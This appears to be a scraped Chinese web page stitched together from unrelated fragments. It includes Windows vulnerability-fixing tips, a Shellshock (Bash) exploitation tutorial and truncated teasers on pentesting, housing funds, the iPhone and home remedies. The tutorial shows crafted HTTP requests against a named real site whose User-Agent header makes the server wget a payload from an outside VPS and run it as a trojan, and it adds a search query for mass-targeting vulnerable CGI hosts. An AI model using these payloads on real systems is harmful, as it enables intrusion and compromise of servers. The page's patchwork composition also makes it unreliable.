1.用记事本编辑如下内容: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}] "Compatibility Flags"=dword:00000400 2.把文件名改为:quicktime.reg 3.运行--点确定--再禁用远程控制 4.或禁用80端口,可是禁用以后就游览不到网页! 5.修补漏洞! 6.查杀还有没有病毒! 7.重做系统也可以!
主要指你开了一些不必要的端口,或者你电脑能执行某些远程代码。其后果是你的电脑被沦为别人的肉鸡,从而导致个人隐私或者资料泄漏!
电脑你肯定得修复漏洞的,不然很容易被黑客远程控制,也许是师傅希望你再去他那里修电脑,所以不让你自己修复漏洞吧
它修复漏洞所使用的补丁是来自微软的,并且经过专业人员筛选的补丁,
过滤掉了微软推送的不稳定的和用户不需要的补丁,如正版验证补丁,
你可以放心的修复
一、黑容发现系统的漏洞的途径一般不外两方面,一是偶然性的发现(所谓的碰巧),另一种是得到了核心资料后根据分析发现。
二、为什么会有漏洞,简单地说,这个世界上基本不存在完美的东西,电脑操作系统也是一样的。
1、当前的主流系统是非常复杂的,而一个复杂的东西就很难做到没有尽善尽美,这就是所谓的毛病、漏洞。就象世界贸易中心大楼一样,也许风吹不倒,地动也不倒,飞机一撞就倒了。
2、一个系统,在使用时,可能面对各种各样的情况,而且很多情况是设计时根本不存在的。还是比如世界贸易中心,谁会想到用飞机去撞它呢!退一步,就算不用飞机去撞它吧,也许破坏份子就能从下水道、通风口进入内里,在里面放炸弹……
3、所以,一个复杂的系统,如果有足够的资料去了解它,去研究它,往往可以找到很多 *** 去破坏它,去非法篡改它。
三、为什么微软当初发现不了?
这太难为微软了,无论哪个公司都做不出完美的东西。何况自个的错往往自个发现不了,那也是最常见的规律,所谓的当局者迷。
之一:对电脑进行安装补丁 第二:杀毒软件和防火墙必须时常升级 第三:查看网站是否有漏洞,看看有没有可疑文件. 第四:关闭一有害端口, 现在有些黑客叫不上黑客 有些都是些菜鸟,他们得到的虚荣心觉得自己能够进入这个网站后台和电脑来炫耀自己
从昨天开始,这个从澳大利亚远渡重洋而来的BASH远程命令执行漏洞就沸腾了整个FreeBuf,大家都在谈论,“互联网的心脏又出血了”,可是,亲,到底怎么对网站进行测试?下面这段脚本
$ env x=‘() { :;}; echo vulnerable' bash -c "echo this is a test"
真的如各路大神们说的这样吗?
它与“心脏出血”漏洞不同,“心脏出血”只能借助窃取用户电脑信息,而bash 漏洞允许黑客远程控制电脑,拿到系统更高权限!其 *** 利用就更简单了——复制/粘贴一行命令代码即可!
Bash漏洞为什么能够执行
Bash漏洞的原理:
BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量!当前版本的bash通过以函数名作为环境变量名,以“(){”开头的字串作为环境变量的值来将函数定义导出为环境变量。
此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令。
简单地说就是,Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令。
Bash漏洞与远程执行有啥联系
看到上面的解释,很多童鞋都理解成了本地的漏洞,然后很多人又觉得,本地有啥可以利用的,于是就忽略了这个神级漏洞的存在。我想说的是,这个漏洞,利用热度可以媲美当年的MS08-067,威力虽然弱了点,但远程控制电脑还是可以的。
首先解释一下cgi脚本。很多网站类似下面的链接:
GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1
后台不仅仅用python、Perl来解释执行并反馈给客户端Response,当然还可以换做bash脚本来解释执行提交上来的GET/POST请求。所以,理论上,你在HTTP请求中插入一个Bash命令,比如
() { :;}; wget http://www.myvps.org/testvul.sh
如果服务器的Bash解释器具有这个漏洞,那么在解释上面这这句话的时候就会执行wget请求,将一个恶意的testvul.sh文件下载到这个服务器,那为何说要放在HTTP头部呢?比如:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive
这是因为这个漏洞是bash解释器在解释某些特殊的变量时才可以触发的:
在于BASH处理以“(){”开头的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令
通过自定义这些参数的值为“函数环境变量”的形式,就可以触发后面的命令,恶意的客户仅需要发送特殊构造的HTTP请求就可以使服务器执行特定的命令(命令的权限和解释HTTP请求的Bash脚本环境相同)。
实际测试中,我的构造的测试请求:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive
过程是这样的:
我发送GET请求–目标服务器cgi路径
目标服务器解析这个get请求,碰到UserAgent后面的参数,Bash解释器就执行了后面的命令
目标服务器wget–我的myvps.org
我的vps记录下这个访问的IP地址
然后查看我的myvps.org服务器的访问记录,就可以确定目标有没有去访问,如果访问了,那么,很好,它是有漏洞的。下面是我的VPS接收到的wget请求访问的日志:
大神是这样测试漏洞的
当然,你也可以这样构造:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive
实际上执行了下面三句:
/usr/bin/wget -O /tmp/muma.sh http://myvps.org/muma.sh ;
chmod 777 /tmp/muma.sh;
./tmp/muma.sh
你会发现,脚本就执行了,这就是Bash漏洞利用测试的精髓。
当然,你可以利用批量Google搜索:
filetype:cgi inurl:cgi-bin site:jp
然后批量提交类似的GET请求,你就能做到批量测试了。测试表明,500个url里有6-8个有bash漏洞
漏洞是指应用软件或操作系统软件在逻辑设计上的缺陷或在编写时产生的错误,
这个缺陷或错误可以被不法者或者电脑黑客利用。修补漏洞,可以用腾讯电脑管家,
修复漏洞,强大智能的漏洞修复工具,全面修复微软系统漏洞和第三方软件漏洞。
金山卫士似乎会关闭掉远程认为可疑,360卫士只能作为辅助,而金山毒霸才是杀毒和防御。如果有病毒或者漏洞应该修复。毕竟金山很有实力。当同时安装360和见南山卫士,有时系统有漏洞,用金山修复时,360会提示有威胁,其实那些补丁都很重要。个人建议使用金山毒霸2012和金山卫士
能够成功地通过web漏洞获取到webshell,对于一次完整的渗透测试来说,仅仅相当于万里长征的第一步。这么说,可能比较夸张吧,并不是所有渗透测试都会遇到几百台机器的大内网。(脉搏小编注:童鞋...
相信现在有很多的朋友们对于住房公积金 都想要了解吧,那么今天小编就来给大家针对住房公积金 进行一个介绍吧,希望小编介绍的内容能够为大家起到帮助哦 第二十九条(提取的其他要求)依照本办法第二十八条第(一...
伴随着我国市场对iPhone而言愈来愈关键,iPhoneCEO桑德斯来我国的频次愈来愈多了,我觉得今日他来了。 就在不久,iPhoneCEO桑德斯在微博上晒出了一张他游玩万里长城的相片,并表明“重阳节...
本文导读目录: 1、网络黑客是怎么练成的 2、黑客怎么入门??? 3、有木有黑客视频教程-魔镜传说远控木马使用教程mjcs.wmv种子下载,谢恩公! 4、黑客是怎么攻击的?它攻击什么啊?...
凡是在一般人眼中看到电脑是这样的: 在好手眼中看电脑是这样的: 首先我来统括下,电脑主要几大硬件设置为:cpu,显卡,内存,硬盘,一般买电脑的话我们主要也就看这几大设置,下面我将别离先容,包你听得...
又到了最容易鼻塞的季节了,小乐这几天也是被堵得慌了。不过这几招,帮了我大忙,亲测有效,你也试试! 方法1:推鼻梁 用食指快速揉搓鼻翼两侧(搓鼻梁),一直挫到鼻根,来回200下。 方法2:...